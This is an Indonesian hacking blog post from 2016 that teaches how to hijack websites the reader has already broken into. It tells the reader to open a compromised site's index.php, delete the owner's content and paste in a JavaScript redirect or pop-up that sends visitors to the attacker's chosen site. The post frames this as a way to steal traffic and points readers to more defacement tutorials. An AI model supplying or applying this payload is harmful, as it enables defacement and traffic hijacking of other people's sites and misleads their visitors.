Saturday, 15 October 2016

Trik Redirect Website

Hello World ; Malem Fans, Please Say Hello Haters ;* #HappySadnight <(")
Selamat Malem Minggu mblo :p , tadinye mau malmingan tpi keknye bakal ujan nih, jdi Cancel deh (sepik ajeh :v)
jadi gua putusin buat Nulis artikel aja utk Pembaca Setia TKJ Cyber Art (alibi sok baik xD )
Kali ini Gua bakal share Salah Satu Cara / Trik Redirect Website .
hahah, yupz artikel kali ini Sederhana sih >.<" , mungkin dah banyak yang tau, karena ini emang Tutor eZ lah :')

Lanjut intip tutornye geenggs ;3

untuk tutor pada artikel kali ini,, Gua praktek pada WebSite yang sudah gua Hack/dipes/berhasil tanem WebShell Sebelumnye, redirect ke website yang Gua inginkan.
jadi buat Lu pade, terserah deh lu mau praktekin di web apa, atau web yg dah lu hack, seterah mau pake Cara/eXploit apaan :3
Ada kelebihan tersendiri ketika lu make trik ini, salah satunya website lu akan menerima traffic visitor dari website yang lu hack,  kan lumayan buat nambah visitor  '-')/

REDIRECT FULL

1. lu harus punya website yang sudah lu hack
2. masuk ke home directory atau public_html, lalu edit file index.php 


3. hapus code original / backup dulu (Hargai Karya WebMaster)
4. Ganti dengan code dibawah ini

<script> delayRedirect('http://tkjcyberart.blogspot.co.id/'); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",10); }</script>

Note:
http://tkjcyberart.blogspot.co.id/ = Ganti dengan website yang di tuju
10 = Time redirect dalam hitungan detik

JUST SHOW IN POP UP WINDOW


1. Sama seperti langkah sebelumnya, hanya saja berbeda code
2. code

<script language="javascript">
window.open('http://tkjcyberart.blogspot.co.id/','','width=900,height=700')
</script>

Note:
http://tkjcyberart.blogspot.co.id/ = Ganti dengan website yang di tuju
width = lebar window popup
height = tinggi window popup

awkkaw, Mudahkan o.O ?? Crotz ah, silahkan nih mayan utk yang maen GA, lumayan buat naikin Visitor Web, sama viewer artikel wkwkkw xD
tapi perlu di inget yee, Sorry TKJ Cyber Art gak maen cara beginian ;p wkwkw
Silahkan baca2 Tutorial berLabel Deface pada Blog Kami \('-')/

Stay Cool and Keep ./Crotz , gaes <(")


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy reading ;*
Sekian dan semoga bermanfaat .. terimakasih


Refrensi: yuzan0tes

./Nuenomaru

Mengertilah kami dan tak harus diHargai, karna Kami miliki Dunia Kami Sendiri

Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

2 comments


EmoticonEmoticon